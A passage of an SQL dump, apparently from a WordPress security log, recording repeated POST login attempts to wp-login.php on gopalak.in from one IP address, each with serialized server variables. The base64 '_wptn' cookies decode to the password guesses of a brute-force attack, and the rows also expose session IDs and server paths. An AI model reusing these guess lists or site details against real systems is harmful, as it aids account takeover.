.3195081;s:12:\"REQUEST_TIME\";i:1745456270;}}','146.190.97.112',1,'2025-04-24 06:27:51','2025-04-24 06:37:57'),(94013,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:199:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhazthZG1pbjEy; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:31:\"https://gopalak.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456272.1557469;s:12:\"REQUEST_TIME\";i:1745456272;}}','146.190.97.112',1,'2025-04-24 06:27:53','2025-04-24 06:37:57'),(94014,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:203:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhazthZG1pbkAyMDA3; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:31:\"https://gopalak.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456273.9683831;s:12:\"REQUEST_TIME\";i:1745456273;}}','146.190.97.112',1,'2025-04-24 06:27:55','2025-04-24 06:37:57'),(94015,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:215:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztHb3BhbGFrQDEyMzQ1Ng%3D%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:31:\"https://gopalak.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456275.757375;s:12:\"REQUEST_TIME\";i:1745456275;}}','146.190.97.112',1,'2025-04-24 06:27:57','2025-04-24 06:37:57'),(94016,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:207:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztBZG1pbkAxMg%3D%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:45:\"https://gopaneconsumerproduct.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456876.0706861;s:12:\"REQUEST_TIME\";i:1745456876;}}','146.190.97.112',1,'2025-04-24 06:37:57','2025-04-24 06:48:05'),(94017,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:205:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhazthZG1pbjIwMDY%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:45:\"https://gopaneconsumerproduct.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456877.9012859;s:12:\"REQUEST_TIME\";i:1745456877;}}','146.190.97.112',1,'2025-04-24 06:37:59','2025-04-24 06:48:05'),(94018,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:205:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztBZG1pbjIwMjE%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:45:\"https://gopaneconsumerproduct.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456879.7061551;s:12:\"REQUEST_TIME\";i:1745456879;}}','146.190.97.112',1,'2025-04-24 06:38:01','2025-04-24 06:48:05'),(94019,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:203:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztBRE1JTkA0MzIx; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:45:\"https://gopaneconsumerproduct.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456881.5339861;s:12:\"REQUEST_TIME\";i:1745456881;}}','146.190.97.112',1,'2025-04-24 06:38:03','2025-04-24 06:48:05'),(94020,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:201:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhazsxMDIwMzA%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:45:\"https://gopaneconsumerproduct.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456883.3644331;s:12:\"REQUEST_TIME\";i:1745456883;}}','146.190.97.112',1,'2025-04-24 06:38:05','2025-04-24 